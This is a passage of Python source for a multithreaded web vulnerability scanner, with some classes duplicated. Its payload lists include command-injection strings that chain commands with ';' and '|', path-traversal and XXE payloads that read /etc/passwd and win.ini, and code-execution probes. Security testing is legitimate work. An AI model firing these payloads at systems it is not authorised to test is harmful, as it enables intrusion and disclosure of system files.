            seconds_wait=2)
        # Command separators crossed with probe commands: the pings are
        # detected by timing, the echo by its marker string.
        separators = ['', ';', '|']
        commands = [
            'ping -c 20 127.0.0.1',
            'ping -n 20 127.0.0.1',
            'echo 123456789098765432345678'
        ]
        self.results = ['123456789098765432345678']
        self.payloads = [sep + cmd for sep in separators for cmd in commands]

    def engine_start(self):
        """Main loop: pull URLs from the KB and test them."""
        self.log(['Engine started.'], DEBUG)
        url_count = 0
        while True:
            # None means every record has been consumed.
            results = self.kb.read_data(URL, CMD_EXEC, url_count)
            if results is None:
                break
            # Only POST (2) and parameterized GET (1) targets are queued.
            if len(results) > 0:
                url_count += len(results)
                self.task_queue.extend(
                    [r for r in results if r[1] in (1, 2)])
                self.dispather.dispath_scan_task()
            if self.exit_flag:
                break
            time.sleep(self.seconds_wait)
        # Shut the worker threads down.
        self.dispather.suicide()
        self.log(['Engine stopped.'], DEBUG)

    def check_on_cmd_exec(self, task, thread_no):
        """Worker: probe a single URL for command execution.

        :task: (url, is_post, code, depth) tuple
        :thread_no: worker thread index
        """
        url, query = extract_path_query(task[0])
        is_post = task[1]
        # Try each payload in turn; stop at the first hit.
        for payload in self.payloads:
            if self.exit_flag:
                self.log(['Thread killed, abort on %s' % task[0]], DEBUG)
                break
            # Send the payload and learn which parameter triggered it.
            index = send_payload(url, is_post, query, payload,
                                 self.analyze_cmd_result, self.cookie)
            if index == -1:
                continue
            # Report and persist the finding.
            self.log([
                '[VULNERABLE] ' + task[0],
                ' [LOCATION] ' + query[index][0],
                ' [PAYLOAD] ' + payload
            ], not DEBUG)
            self.kb.save_data(CMD,
                              (task[0], query[index][0], payload, 'CMD'))
            break
        else:
            self.log(['[INVULNERABLE] ' + task[0]], DEBUG)

    def analyze_cmd_result(self, payload, src, ori_time):
        """Decide whether *src* indicates the payload command ran.

        Echo payloads: the marker must appear without its command line
        being merely reflected. Ping payloads: judged by elapsed time.
        """
        marker = self.results[0]
        if 'echo' in payload:
            echoed = marker in src
            command_reflected = ('echo ' + marker) in src
            return echoed and not command_reflected
        # Timing side channel for the ping payloads (20 pings > 19s).
        return (time.time() - ori_time) > 19

    def exit(self):
        """Signal the dispatcher and the main loop to stop."""
        self.dispather.exit()
        self.exit_flag = True

    def log(self, msgs, debug):
        sink = self.logger.debug if debug else self.logger.info
        sink(self.owner, msgs)
class INFOLeakage(object):
    """Information-leakage scanner: probes KB targets and stores findings."""

    def __init__(self, kb, logger, thread_num, cookie):
        """
        :kb: Universal KnowledgeBase
        :logger: output logger
        :thread_num: number of scan threads
        :cookie: cookie
        """
        super(INFOLeakage, self).__init__()
        self.owner = 'INFOLeakage'
        self.kb = kb
        self.cookie = cookie
        self.logger = logger
        self.task_queue = []
        self.seconds_wait = 2
        self.exit_flag = False
        # Thread dispatcher.
        self.dispather = ParallelDispatcher(
            thread_num=thread_num,
            data_source=self.task_queue,
            execute_func=self.check_on_INFO_LEAKAGE,
            logger=self.logger,
            owner=self.owner,
            start_index=0,
            seconds_wait=2)
        # pathlist (defined elsewhere) maps probe path -> expected marker.
        self.payloads = pathlist

    def engine_start(self):
        """Main loop: pull URLs from the KB and test them."""
        self.log(['Engine started.'], DEBUG)
        url_count = 0
        while True:
            # None means every record has been consumed.
            results = self.kb.read_data(URL, INFO_Leakage, url_count)
            if results is None:
                break
            # Only POST (2) and parameterized GET (1) targets are queued.
            if len(results) > 0:
                url_count += len(results)
                self.task_queue.extend(
                    [r for r in results if r[1] in (1, 2)])
                self.dispather.dispath_scan_task()
            if self.exit_flag:
                break
            time.sleep(self.seconds_wait)
        # Shut the worker threads down.
        self.dispather.suicide()
        self.log(['Engine stopped.'], DEBUG)

    def check_on_INFO_LEAKAGE(self, task, thread_no):
        """Worker: probe a single URL for information leakage.

        :task: (url, is_post, code, depth) tuple
        :thread_no: worker thread index
        """
        url, query = extract_path_query(task[0])
        is_post = task[1]
        # Try each probe path in turn; stop at the first hit.
        for payload in self.payloads.keys():
            if self.exit_flag:
                self.log(['Thread killed, abort on %s' % task[0]], DEBUG)
                break
            # Send the payload and learn which parameter triggered it.
            index = send_payload(url, is_post, query, payload,
                                 self.analyze_INFO_result, self.cookie)
            if index == -1:
                continue
            # Report and persist the finding.
            self.log([
                '[VULNERABLE] ' + task[0],
                ' [LOCATION] ' + query[index][0],
                ' [PAYLOAD] ' + payload
            ], not DEBUG)
            self.kb.save_data(INFO,
                              (task[0], query[index][0], payload, 'INFO'))
            break
        else:
            self.log(['[INVULNERABLE] ' + task[0]], DEBUG)

    def analyze_INFO_result(self, payload, src, ori_time):
        """True when the marker paired with *payload* shows up in *src*."""
        return self.payloads[payload] in src

    def exit(self):
        """Signal the dispatcher and the main loop to stop."""
        self.dispather.exit()
        self.exit_flag = True

    def log(self, msgs, debug):
        sink = self.logger.debug if debug else self.logger.info
        sink(self.owner, msgs)
class LFIScanner(object):
    """LFI/XXE scanner: probes KB targets and stores findings."""

    def __init__(self, kb, logger, thread_num, cookie):
        """
        :kb: Universal KnowledgeBase
        :logger: output logger
        :thread_num: number of scan threads
        :cookie: cookie
        """
        super(LFIScanner, self).__init__()
        self.kb = kb
        self.cookie = cookie
        self.logger = logger
        self.task_queue = []
        self.seconds_wait = 2
        self.exit_flag = False
        self.owner = 'LFIScanner'
        # Thread dispatcher.
        self.dispather = ParallelDispatcher(
            thread_num=thread_num,
            data_source=self.task_queue,
            execute_func=self.check_on_lfi,
            logger=self.logger,
            owner=self.owner,
            start_index=0,
            seconds_wait=2)
        # Traversal prefix x target file x suffix tricks (null byte, %00, ...).
        heads = ['../' * 16]
        self.bodys = ['etc/passwd', 'windows/win.ini']
        tails = ['', '\0', '%00', '?', '/' + './' * 2048]
        self.payloads = [''.join([a, b, c])
                         for a in heads
                         for b in self.bodys
                         for c in tails]
        # Two XXE payloads; detection works the same as for the LFI bodies.
        # BUGFIX: the win.ini payload's SYSTEM identifier lacked its
        # closing '"', making the XML malformed (compare payload 1).
        temp = ['<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
                '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/windows/win.ini">]><foo>&xxe;</foo>']
        self.payloads.extend(temp)
        self.bodys.extend(temp)
        # One compiled result regex per entry in self.bodys, same order.
        results = [
            r'.*root:[^\n]*:/bin/sh.*',
            r'.*\[extensions\].*',
            r'.*root:[^\n]*:/bin/sh.*',
            r'.*\[extensions\].*']
        self.results = [re.compile(rgx, re.DOTALL | re.IGNORECASE)
                        for rgx in results]

    def engine_start(self):
        """Main loop: pull URLs from the KB and test them."""
        self.log(['Engine started.'], DEBUG)
        url_count = 0
        while True:
            # None means every record has been consumed.
            results = self.kb.read_data(URL, LFI_SCANNER, url_count)
            if results is None:
                break
            # Only POST (2) and parameterized GET (1) targets are queued.
            if len(results) > 0:
                url_count += len(results)
                self.task_queue.extend([result for result in results
                                        if (result[1] == 1 or
                                            result[1] == 2)])
                self.dispather.dispath_scan_task()
            if self.exit_flag:
                break
            time.sleep(self.seconds_wait)
        # Shut the worker threads down.
        self.dispather.suicide()
        self.log(['Engine stopped.'], DEBUG)

    def check_on_lfi(self, task, thread_no):
        """Worker: probe a single URL for LFI/XXE.

        :task: (url, is_post, code, depth) tuple
        :thread_no: worker thread index
        """
        url, query = extract_path_query(task[0])
        is_post = task[1]
        # Try each payload in turn; stop at the first hit.
        for payload in self.payloads:
            if self.exit_flag:
                self.log(['Thread killed, abort on %s' % task[0]], DEBUG)
                break
            # Send the payload and learn which parameter triggered it.
            index = send_payload(url, is_post, query, payload,
                                 self.analyze_lfi_result, self.cookie)
            if index == -1:
                continue
            # Report and persist the finding.
            self.log(['[VULNERABLE] ' + task[0],
                      ' [LOCATION] ' + query[index][0],
                      ' [PAYLOAD] ' + payload], not DEBUG)
            self.kb.save_data(LFI,
                              (task[0], query[index][0], payload, 'LFI'))
            break
        else:
            self.log(['[INVULNERABLE] ' + task[0]], DEBUG)

    def analyze_lfi_result(self, payload, src, _):
        """Match *src* against the regex paired with the payload's body.

        Only the first body found inside the payload is consulted; its
        regex decides the verdict.
        """
        for body, result_re in zip(self.bodys, self.results):
            if body in payload:
                return result_re.match(src) is not None
        return False

    def exit(self):
        """Signal the dispatcher and the main loop to stop."""
        self.dispather.exit()
        self.exit_flag = True

    def log(self, msgs, debug):
        if debug:
            self.logger.debug(self.owner, msgs)
        else:
            self.logger.info(self.owner, msgs)
class ReflectedXss(object):
    """Detector for reflected (or stored) XSS: a probe succeeds when the
    payload is echoed verbatim in the returned page."""

    def __init__(self, kb, logger, thread_num, cookie):
        """
        :kb: Universal KnowledgeBase
        :logger: output logger
        :thread_num: number of worker threads
        :cookie: cookie sent with every probe request
        """
        super(ReflectedXss, self).__init__()
        self.kb = kb
        self.logger = logger
        self.cookie = cookie
        self.owner = 'ReflectedXss'
        self.task_queue = []
        self.seconds_wait = 2
        self.exit_flag = False
        # Payload templates with their random markers substituted in.
        self.payloads = [replace_randomize(tpl) for tpl in PAYLOADS]
        # Thread dispatcher
        self.dispather = ParallelDispatcher(
            thread_num=thread_num,
            data_source=self.task_queue,
            execute_func=self.check_on_reflected_xss,
            logger=self.logger,
            owner=self.owner,
            start_index=0,
            seconds_wait=2
        )

    def engine_start(self):
        """Main loop of the reflected-XSS scanner: keep pulling URL batches
        from the kb and hand them to the dispatcher until exhausted."""
        url_count = 0
        while True:
            batch = self.kb.read_data(URL, XSS_SCANNER, url_count)
            # A None batch means every URL has been consumed.
            if batch is None:
                break
            if len(batch) > 0:
                url_count += len(batch)
                # Keep only 2-POST entries and 1-GET-with-parameters entries.
                self.task_queue.extend(entry for entry in batch
                                       if entry[1] in (1, 2))
            self.dispather.dispath_scan_task()
            # Honour a pending shutdown request.
            if self.exit_flag:
                break
            time.sleep(self.seconds_wait)
        # Let the worker threads wind down.
        self.dispather.suicide()

    def check_on_reflected_xss(self, task, thread_no):
        """Worker: probe one URL with every XSS payload, stopping at the
        first hit.

        :task: (url, is_post, code, depth) tuple
        :thread_no: current thread number
        """
        target, query = extract_path_query(task[0])
        method_is_post = task[1]
        for candidate in self.payloads:
            # Abort quickly when the engine is shutting down.
            if self.exit_flag:
                self.log(['Thread killed, abort on %s' % task[0]], DEBUG)
                break
            # Fire the payload; a non-negative index names the weak parameter.
            hit = send_payload(target, method_is_post, query, candidate,
                               self.analyze_reflected_result, self.cookie)
            if hit == -1:
                continue
            # Report and persist the finding, then stop probing this URL.
            self.log(['[VULNERABLE] ' + task[0],
                      '[LOCATION] ' + query[hit][0],
                      '[PAYLOAD] ' + candidate], not DEBUG)
            self.kb.save_data(XSS, (task[0], query[hit][0], candidate, 'XSS'))
            break
        else:
            self.log(['[INVULNERABLE] ' + task[0]], DEBUG)

    def analyze_reflected_result(self, payload, src, _):
        """A parameter is vulnerable when the payload comes back verbatim
        in the page source."""
        return src.find(payload) != -1

    def exit(self):
        self.dispather.exit()
        self.exit_flag = True

    def log(self, msgs, debug):
        # Route to the debug or info channel of the shared logger.
        sink = self.logger.debug if debug else self.logger.info
        sink(self.owner, msgs)
class INFOLeakage(object):
    """Information-leakage scanner: probes well-known sensitive paths and
    checks the response for each path's signature string; findings are
    written back to the knowledge base."""

    def __init__(self, kb, logger, thread_num, cookie):
        """
        :kb: Universal KnowledgeBase
        :logger: output logger
        :thread_num: number of scanning threads
        :cookie: cookie sent with every probe request
        """
        super(INFOLeakage, self).__init__()
        self.kb = kb
        self.cookie = cookie
        self.logger = logger
        self.task_queue = []
        self.seconds_wait = 2
        self.exit_flag = False
        self.owner = 'INFOLeakage'
        # Thread dispatcher
        self.dispather = ParallelDispatcher(
            thread_num=thread_num,
            data_source=self.task_queue,
            execute_func=self.check_on_INFO_LEAKAGE,
            logger=self.logger,
            owner=self.owner,
            start_index=0,
            seconds_wait=2
        )
        # Mapping: probe path -> signature string expected in the response.
        self.payloads = pathlist

    def engine_start(self):
        """Main loop: fetch URL batches from the kb and dispatch them."""
        self.log(['Engine started.'], DEBUG)
        url_count = 0
        while True:
            batch = self.kb.read_data(URL, INFO_Leakage, url_count)
            # None signals that the URL feed is exhausted.
            if batch is None:
                break
            if len(batch) > 0:
                url_count += len(batch)
                # Only 2-POST and 1-GET-with-parameters entries are queued.
                self.task_queue.extend(entry for entry in batch
                                       if entry[1] in (1, 2))
            self.dispather.dispath_scan_task()
            # Bail out once a shutdown has been requested.
            if self.exit_flag:
                break
            time.sleep(self.seconds_wait)
        # Wait for the workers to stop.
        self.dispather.suicide()
        self.log(['Engine stopped.'], DEBUG)

    def check_on_INFO_LEAKAGE(self, task, thread_no):
        """Worker: test one URL for information leakage, first hit wins.

        :task: (url, is_post, code, depth) tuple
        :thread_no: current thread number
        """
        base_url, query = extract_path_query(task[0])
        method_is_post = task[1]
        for probe_path in list(self.payloads):
            # Stop immediately on shutdown.
            if self.exit_flag:
                self.log(['Thread killed, abort on %s' % task[0]], DEBUG)
                break
            # Send the probe; a non-negative index names the parameter.
            hit = send_payload(base_url, method_is_post, query, probe_path,
                               self.analyze_INFO_result, self.cookie)
            if hit == -1:
                continue
            # Report and persist the finding.
            self.log(['[VULNERABLE] ' + task[0],
                      ' [LOCATION] ' + query[hit][0],
                      ' [PAYLOAD] ' + probe_path], not DEBUG)
            self.kb.save_data(INFO, (task[0], query[hit][0], probe_path, 'INFO'))
            break
        else:
            self.log(['[INVULNERABLE] ' + task[0]], DEBUG)

    def analyze_INFO_result(self, payload, src, ori_time):
        """Leakage is confirmed when the signature string registered for
        this probe path appears in the response body."""
        signature = self.payloads[payload]
        return signature in src

    def exit(self):
        self.dispather.exit()
        self.exit_flag = True

    def log(self, msgs, debug):
        sink = self.logger.debug if debug else self.logger.info
        sink(self.owner, msgs)
class LFIScanner(object):
    """LFI scanner: pulls crawled URLs from the knowledge base, probes each
    parameter with path-traversal and XXE payloads, and stores hits back
    into the knowledge base.

    NOTE(review): this is a byte-for-byte duplicate of the ``LFIScanner``
    defined earlier in this file; this later definition is the one that
    takes effect — deduplicate.
    """

    def __init__(self, kb, logger, thread_num, cookie):
        """
        :kb: Universal KnowledgeBase
        :logger: output logger
        :thread_num: number of scanning threads
        :cookie: cookie sent with every probe request
        """
        super(LFIScanner, self).__init__()
        self.kb = kb
        self.cookie = cookie
        self.logger = logger
        self.task_queue = []
        self.seconds_wait = 2
        self.exit_flag = False
        self.owner = 'LFIScanner'
        # Thread dispatcher
        self.dispather = ParallelDispatcher(
            thread_num=thread_num,
            data_source=self.task_queue,
            execute_func=self.check_on_lfi,
            logger=self.logger,
            owner=self.owner,
            start_index=0,
            seconds_wait=2
        )
        heads = ['../' * 16]
        self.bodys = ['etc/passwd', 'windows/win.ini']
        tails = ['', '\0', '%00', '?', '/' + './' * 2048]
        self.payloads = [''.join([a, b, c])
                         for a in heads
                         for b in self.bodys
                         for c in tails]
        # Two XXE payloads; detection shares the same body->regex mapping.
        # FIX: the win.ini payload was missing the closing '"' on the SYSTEM
        # literal, producing malformed XML that no parser would resolve.
        temp = [
            '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
            '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/windows/win.ini">]><foo>&xxe;</foo>'
        ]
        self.payloads.extend(temp)
        self.bodys.extend(temp)
        # One compiled signature regex per entry in self.bodys (same order).
        # FIX: also match /bin/bash — on most Linux systems root's shell is
        # /bin/bash, which the old /bin/sh-only pattern missed.
        results = [
            r'.*root:[^\n]*:/bin/(?:ba)?sh.*',
            r'.*\[extensions\].*',
            r'.*root:[^\n]*:/bin/(?:ba)?sh.*',
            r'.*\[extensions\].*'
        ]
        self.results = [re.compile(rgx, re.DOTALL | re.IGNORECASE)
                        for rgx in results]

    def engine_start(self):
        """Main loop: read URL batches from the kb and dispatch them."""
        self.log(['Engine started.'], DEBUG)
        url_count = 0
        while True:
            # Read a batch of URLs; None means the feed is exhausted.
            results = self.kb.read_data(URL, LFI_SCANNER, url_count)
            if results is None:
                break
            # Queue only 2-POST and 1-GET-with-parameters entries.
            if len(results) > 0:
                url_count += len(results)
                self.task_queue.extend([result for result in results
                                        if (result[1] == 1 or result[1] == 2)])
            self.dispather.dispath_scan_task()
            # Stop as soon as the exit flag is raised.
            if self.exit_flag:
                break
            time.sleep(self.seconds_wait)
        # Wait for worker threads to shut down.
        self.dispather.suicide()
        self.log(['Engine stopped.'], DEBUG)

    def check_on_lfi(self, task, thread_no):
        """Worker: test a single URL for LFI; stop at the first hit.

        :task: (url, is_post, code, depth) tuple
        :thread_no: current thread number
        """
        url, query = extract_path_query(task[0])
        is_post = task[1]
        # Try every payload; one success ends the scan for this URL.
        for payload in self.payloads:
            # Abort quickly when the engine is being shut down.
            if self.exit_flag:
                self.log(['Thread killed, abort on %s' % task[0]], DEBUG)
                break
            # Send the payload; returns the vulnerable parameter index or -1.
            index = send_payload(url, is_post, query, payload,
                                 self.analyze_lfi_result, self.cookie)
            if index == -1:
                continue
            # Report and persist the finding.
            self.log(['[VULNERABLE] ' + task[0],
                      ' [LOCATION] ' + query[index][0],
                      ' [PAYLOAD] ' + payload], not DEBUG)
            self.kb.save_data(LFI, (task[0], query[index][0], payload, 'LFI'))
            break
        else:
            self.log(['[INVULNERABLE] ' + task[0]], DEBUG)

    def analyze_lfi_result(self, payload, src, _):
        """Return True when *src* matches the signature regex belonging to
        the body embedded in *payload*; only the first matching body is
        considered (bodys and results are kept in the same order)."""
        for body, pattern in zip(self.bodys, self.results):
            if body in payload:
                return pattern.match(src) is not None
        return False

    def exit(self):
        # Request shutdown; engine_start notices the flag on its next pass.
        self.dispather.exit()
        self.exit_flag = True

    def log(self, msgs, debug):
        if debug:
            self.logger.debug(self.owner, msgs)
        else:
            self.logger.info(self.owner, msgs)
class CODEExec(object):
    """Code-execution scanner: injects small print/echo statements for
    several server-side languages and looks for their expanded output in
    the response."""

    # Number of times an executed payload repeats the '%s' probe string.
    # FIX: previously this constant lived only inside __init__ while
    # analyze_CODE_result hard-coded '5' again; both now share one source.
    PRINT_REPEATS = 5

    def __init__(self, kb, logger, thread_num, cookie):
        """
        :kb: Universal KnowledgeBase
        :logger: output logger
        :thread_num: number of scanning threads
        :cookie: cookie sent with every probe request
        """
        super(CODEExec, self).__init__()
        self.kb = kb
        self.cookie = cookie
        self.logger = logger
        self.task_queue = []
        self.seconds_wait = 2
        self.exit_flag = False
        self.owner = 'CODEExec'
        # Thread dispatcher
        self.dispather = ParallelDispatcher(
            thread_num=thread_num,
            data_source=self.task_queue,
            execute_func=self.check_on_CODE_exec,
            logger=self.logger,
            owner=self.owner,
            start_index=0,
            seconds_wait=2
        )
        # Marker an executed payload leaves in the page: '%s' repeated
        # PRINT_REPEATS times.  A merely-reflected payload contains the
        # source text ("str_repeat('%s',5)" etc.), not this expansion.
        self.expected_output = '%s' * self.PRINT_REPEATS
        PRINT_STRINGS = (
            # PHP http://php.net/eval
            "echo str_repeat('%%s',%s);" % self.PRINT_REPEATS,
            # Perl http://perldoc.perl.org/functions/eval.html
            "print '%%s'x%s" % self.PRINT_REPEATS,
            # Python
            # http://docs.python.org/reference/simple_stmts.html#the-exec-statement
            "print '%%s'*%s" % self.PRINT_REPEATS,
            # ASP
            "Response.Write(new String(\"%%s\",%s))" % self.PRINT_REPEATS,
        )
        self.payloads = PRINT_STRINGS

    def engine_start(self):
        """Main loop: fetch URL batches from the kb and dispatch them."""
        self.log(['Engine started.'], DEBUG)
        url_count = 0
        while True:
            # Read a batch of URLs; None means the feed is exhausted.
            results = self.kb.read_data(URL, CODE_EXEC, url_count)
            if results is None:
                break
            # Queue only 2-POST and 1-GET-with-parameters entries.
            if len(results) > 0:
                url_count += len(results)
                self.task_queue.extend([result for result in results
                                        if (result[1] == 1 or result[1] == 2)])
            self.dispather.dispath_scan_task()
            # Stop once a shutdown has been requested.
            if self.exit_flag:
                break
            time.sleep(self.seconds_wait)
        # Wait for worker threads to finish.
        self.dispather.suicide()
        self.log(['Engine stopped.'], DEBUG)

    def check_on_CODE_exec(self, task, thread_no):
        """Worker: test one URL for code execution; first hit wins.

        :task: (url, is_post, code, depth) tuple
        :thread_no: current thread number
        """
        url, query = extract_path_query(task[0])
        is_post = task[1]
        for payload in self.payloads:
            # Abort quickly on shutdown.
            if self.exit_flag:
                self.log(['Thread killed, abort on %s' % task[0]], DEBUG)
                break
            # Send the payload; returns the vulnerable parameter index or -1.
            index = send_payload(url, is_post, query, payload,
                                 self.analyze_CODE_result, self.cookie)
            if index == -1:
                continue
            # Report and persist the finding.
            self.log(['[VULNERABLE] ' + task[0],
                      ' [LOCATION] ' + query[index][0],
                      ' [PAYLOAD] ' + payload], not DEBUG)
            self.kb.save_data(CODE, (task[0], query[index][0], payload, 'CODE'))
            break
        else:
            self.log(['[INVULNERABLE] ' + task[0]], DEBUG)

    def analyze_CODE_result(self, payload, src, ori_time):
        """Execution is confirmed when the expanded probe marker (derived
        from PRINT_REPEATS in __init__) appears in the response."""
        return self.expected_output in src

    def exit(self):
        self.dispather.exit()
        self.exit_flag = True

    def log(self, msgs, debug):
        if debug:
            self.logger.debug(self.owner, msgs)
        else:
            self.logger.info(self.owner, msgs)
class UrlRedirect(object):
    """Open-redirect detector: injects redirect targets and checks whether
    the response ends up on the designated page."""

    def __init__(self, kb, logger, thread_num, cookie):
        """
        :kb: Universal KnowledgeBase
        :logger: output logger
        :thread_num: number of worker threads
        :cookie: cookie sent with every probe request
        """
        super(UrlRedirect, self).__init__()
        self.kb = kb
        self.logger = logger
        self.cookie = cookie
        self.owner = 'UrlRedirect'
        self.task_queue = []
        self.seconds_wait = 2
        self.exit_flag = False
        # Redirect targets to inject (absolute and scheme-relative forms).
        self.payloads = ['http://www.baidu.com/', '//baidu.com']
        # Thread dispatcher
        self.dispather = ParallelDispatcher(
            thread_num=thread_num,
            data_source=self.task_queue,
            execute_func=self.check_on_url_redirect,
            logger=self.logger,
            owner=self.owner,
            start_index=0,
            seconds_wait=2
        )

    def engine_start(self):
        """Main loop of the URL-redirect scanner: pull URL batches from the
        kb and feed them to the dispatcher until none remain."""
        self.log(['Engine started.'], DEBUG)
        url_count = 0
        while True:
            batch = self.kb.read_data(URL, URL_REDIRECT, url_count)
            # None marks the end of the URL feed.
            if batch is None:
                break
            if len(batch) > 0:
                url_count += len(batch)
                # Only 2-POST and 1-GET-with-parameters entries are queued.
                self.task_queue.extend(entry for entry in batch
                                       if entry[1] in (1, 2))
            self.dispather.dispath_scan_task()
            # Honour a pending shutdown request.
            if self.exit_flag:
                break
            time.sleep(self.seconds_wait)
        # Wait for worker threads to wind down.
        self.dispather.suicide()
        self.log(['Engine stopped.'], DEBUG)

    def check_on_url_redirect(self, task, thread_no):
        """Worker: probe one URL for an open redirect, first hit wins.

        :task: (url, is_post, code, depth) tuple
        :thread_no: current thread number
        """
        target, query = extract_path_query(task[0])
        method_is_post = task[1]
        for candidate in self.payloads:
            # Abort quickly when the engine is shutting down.
            if self.exit_flag:
                self.log(['Thread killed, abort on %s' % task[0]], DEBUG)
                break
            # Inject the redirect target; non-negative index = weak param.
            hit = send_payload(target, method_is_post, query, candidate,
                               self.analyze_urlredirect_result, self.cookie)
            if hit == -1:
                continue
            # Report and persist the finding.
            self.log(['[VULNERABLE] ' + task[0],
                      '[LOCATION] ' + query[hit][0],
                      '[PAYLOAD] ' + candidate], not DEBUG)
            self.kb.save_data(
                URL_REDIRECT,
                (task[0], query[hit][0], candidate, 'URL_REDIRECT'))
            break
        else:
            self.log(['[INVULNERABLE] ' + task[0]], DEBUG)

    def analyze_urlredirect_result(self, payload, src, _):
        """Return 1 when the response is the target page (Baidu's homepage
        title) or an interstitial jump page, else 0."""
        markers = (u'<title>百度一下,你就知道</title>', u'跳转中')
        for marker in markers:
            if marker in src:
                return 1
        return 0

    def exit(self):
        self.dispather.exit()
        self.exit_flag = True

    def log(self, msgs, debug):
        sink = self.logger.debug if debug else self.logger.info
        sink(self.owner, msgs)
class UrlRedirect(object):
    """Open-redirect detector: injects redirect targets and checks whether
    the response lands on the designated page.

    NOTE(review): an identical ``UrlRedirect`` class appears earlier in
    this file; this later definition shadows it — deduplicate.
    """

    def __init__(self, kb, logger, thread_num, cookie):
        """
        :kb: Universal KnowledgeBase
        :logger: output logger
        :thread_num: number of worker threads
        :cookie: cookie sent with every probe request
        """
        super(UrlRedirect, self).__init__()
        self.kb = kb
        self.logger = logger
        self.cookie = cookie
        self.owner = 'UrlRedirect'
        self.task_queue = []
        self.seconds_wait = 2
        self.exit_flag = False
        # Redirect targets to inject.
        test_urls = ['http://www.baidu.com/', '//baidu.com']
        self.payloads = test_urls
        # Thread dispatcher
        self.dispather = ParallelDispatcher(
            thread_num=thread_num,
            data_source=self.task_queue,
            execute_func=self.check_on_url_redirect,
            logger=self.logger,
            owner=self.owner,
            start_index=0,
            seconds_wait=2
        )

    def engine_start(self):
        """Main loop: pull URL batches from the kb and dispatch them."""
        self.log(['Engine started.'], DEBUG)
        seen = 0
        while True:
            rows = self.kb.read_data(URL, URL_REDIRECT, seen)
            # A None result means the URL feed has been drained.
            if rows is None:
                break
            if rows:
                seen += len(rows)
                # Restrict to 2-POST and 1-GET-with-parameters entries.
                wanted = [row for row in rows
                          if row[1] == 1 or row[1] == 2]
                self.task_queue.extend(wanted)
            self.dispather.dispath_scan_task()
            # Respect a pending shutdown request.
            if self.exit_flag:
                break
            time.sleep(self.seconds_wait)
        # Wait for worker threads to terminate.
        self.dispather.suicide()
        self.log(['Engine stopped.'], DEBUG)

    def check_on_url_redirect(self, task, thread_no):
        """Worker: probe one URL for an open redirect.

        :task: (url, is_post, code, depth) tuple
        :thread_no: current thread number
        """
        path, params = extract_path_query(task[0])
        post_flag = task[1]
        for redirect_target in self.payloads:
            # Abort quickly on shutdown.
            if self.exit_flag:
                self.log(['Thread killed, abort on %s' % task[0]], DEBUG)
                break
            # Inject the redirect target into each parameter in turn.
            where = send_payload(path, post_flag, params, redirect_target,
                                 self.analyze_urlredirect_result, self.cookie)
            if where == -1:
                continue
            # Report and persist the finding, then stop for this URL.
            self.log(['[VULNERABLE] ' + task[0],
                      '[LOCATION] ' + params[where][0],
                      '[PAYLOAD] ' + redirect_target], not DEBUG)
            self.kb.save_data(
                URL_REDIRECT,
                (task[0], params[where][0], redirect_target, 'URL_REDIRECT'))
            break
        else:
            self.log(['[INVULNERABLE] ' + task[0]], DEBUG)

    def analyze_urlredirect_result(self, payload, src, _):
        """Return 1 when the response shows Baidu's homepage title or an
        interstitial jump page, else 0."""
        if u'<title>百度一下,你就知道</title>' not in src and u'跳转中' not in src:
            return 0
        return 1

    def exit(self):
        self.dispather.exit()
        self.exit_flag = True

    def log(self, msgs, debug):
        if debug:
            self.logger.debug(self.owner, msgs)
        else:
            self.logger.info(self.owner, msgs)
class CMDExec(object):
    """Command-execution scanner: injects shell commands (echo marker or
    long-running ping) and detects execution either by marker output or by
    the induced response delay."""

    def __init__(self, kb, logger, thread_num, cookie):
        """
        :kb: Universal KnowledgeBase
        :logger: output logger
        :thread_num: number of scanning threads
        :cookie: cookie sent with every probe request
        """
        super(CMDExec, self).__init__()
        self.kb = kb
        self.cookie = cookie
        self.logger = logger
        self.task_queue = []
        self.seconds_wait = 2
        self.exit_flag = False
        self.owner = 'CMDExec'
        # Thread dispatcher
        self.dispather = ParallelDispatcher(
            thread_num=thread_num,
            data_source=self.task_queue,
            execute_func=self.check_on_cmd_exec,
            logger=self.logger,
            owner=self.owner,
            start_index=0,
            seconds_wait=2
        )
        # Command separators crossed with probe commands.
        separators = ['', ';', '|']
        commands = ['ping -c 20 127.0.0.1',
                    'ping -n 20 127.0.0.1',
                    'echo 123456789098765432345678']
        self.results = ['123456789098765432345678']
        self.payloads = [sep + cmd for sep in separators for cmd in commands]

    def engine_start(self):
        """Main loop: fetch URL batches from the kb and dispatch them."""
        self.log(['Engine started.'], DEBUG)
        url_count = 0
        while True:
            batch = self.kb.read_data(URL, CMD_EXEC, url_count)
            # None marks the end of the URL feed.
            if batch is None:
                break
            if len(batch) > 0:
                url_count += len(batch)
                # Only 2-POST and 1-GET-with-parameters entries are queued.
                self.task_queue.extend(entry for entry in batch
                                       if entry[1] in (1, 2))
            self.dispather.dispath_scan_task()
            # Honour a pending shutdown request.
            if self.exit_flag:
                break
            time.sleep(self.seconds_wait)
        # Wait for the workers to finish.
        self.dispather.suicide()
        self.log(['Engine stopped.'], DEBUG)

    def check_on_cmd_exec(self, task, thread_no):
        """Worker: test one URL for command execution, first hit wins.

        :task: (url, is_post, code, depth) tuple
        :thread_no: current thread number
        """
        base_url, query = extract_path_query(task[0])
        method_is_post = task[1]
        for candidate in self.payloads:
            # Abort quickly on shutdown.
            if self.exit_flag:
                self.log(['Thread killed, abort on %s' % task[0]], DEBUG)
                break
            # Inject the command; a non-negative index names the parameter.
            hit = send_payload(base_url, method_is_post, query, candidate,
                               self.analyze_cmd_result, self.cookie)
            if hit == -1:
                continue
            # Report and persist the finding.
            self.log(['[VULNERABLE] ' + task[0],
                      ' [LOCATION] ' + query[hit][0],
                      ' [PAYLOAD] ' + candidate], not DEBUG)
            self.kb.save_data(CMD, (task[0], query[hit][0], candidate, 'CMD'))
            break
        else:
            self.log(['[INVULNERABLE] ' + task[0]], DEBUG)

    def analyze_cmd_result(self, payload, src, ori_time):
        """Echo payloads: the marker must appear WITHOUT the literal
        'echo ' prefix (which would just be the payload reflected back).
